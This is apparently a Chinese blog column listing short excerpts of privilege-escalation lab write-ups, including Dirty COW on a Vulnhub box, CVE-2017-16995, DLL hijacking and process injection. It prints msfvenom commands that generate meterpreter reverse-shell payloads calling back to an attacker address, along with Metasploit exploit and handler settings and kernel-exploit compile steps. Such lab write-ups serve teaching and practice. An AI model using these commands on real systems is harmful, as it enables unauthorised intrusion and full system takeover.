![](https://img-blog.csdnimg.cn/20190918140145169.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
提权测试
提权实验测试
草木caomu
种子落地生根发芽,一定要成为参天大树。
展开
-
提权_Linux提权_suid
1.MSF连接目标机生成msf后门,上传到目标机,开启监听,等待运行。>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=6666 -i 3 -f elf -o shell //生成后门>set payload linux/x64/meterpreter/reverse_tcp>set lhost 0.0.0.0>set lport 6666>exploit2原创 2021-12-08 15:28:07 · 2441 阅读 · 0 评论 -
提权_Linux 脏牛漏洞提权 【Vulnhub靶场 Lampiao】
1.nmap 扫描主机扫描同网段存活主机扫描目标主机开放端口,扫描到开放了1898端口nmap -p1-65535 192.168.61.1382.发现web网站,搜集利用漏洞通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupalmsf 搜索drupal漏洞,使用可利用漏洞进行攻击>search drupal>use exploit/unix/webapp/drupal_drupalgeddon2>set rhosts 192.原创 2021-12-07 17:25:09 · 3295 阅读 · 0 评论 -
提权_【CVE-2017-16995】 Linux 内核漏洞提权
1.信息收集上传信息收集脚本,运行并查看是否有【CVE-2017-16995】漏洞这里我用到的信息收集脚本为:linux-exploit-suggester-2.plperl linux-exploit-suggester-2.pl2.上传EXP3.编译执行gcc 45010.c -o 45010 //编译45010.c./45010 //运行45010,运行不了就【chmod +x 45010】给他个执行权限原创 2021-11-29 13:00:55 · 2849 阅读 · 0 评论 -
提权_DLL劫持提权
1.通过火绒剑分析进程分析进程调用模块,找到可以利用的dll文件,本次试验劫持idmmkb.dll文件2.MSF生成后门dll木马msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.61.131 lport=8888 -f dll >C:\Users\Ninja\Desktop\idmmkb.dll3.上传替换4.MSF监听>use exploit/multi/handler>set payload原创 2021-11-23 16:07:48 · 1711 阅读 · 0 评论 -
提权_Windows 2003 进程注入提权
1.首先使用Process Injector进程注入工具,使用命令查看运行进程的PIDpinjector.exe -l这里我们注入进程services.exe,可以看到它是系统权限运行的进程,记住的它的PID:3562.接着使用命令注入刚才记住的进程,监听端口设置为9988pinjector.exe -p 356 cmd.exe 99883.最后我们使用 nc 监听本地9988的端口使用命令 whoami 可以看到注入提权成功。...原创 2021-11-22 09:56:59 · 1721 阅读 · 0 评论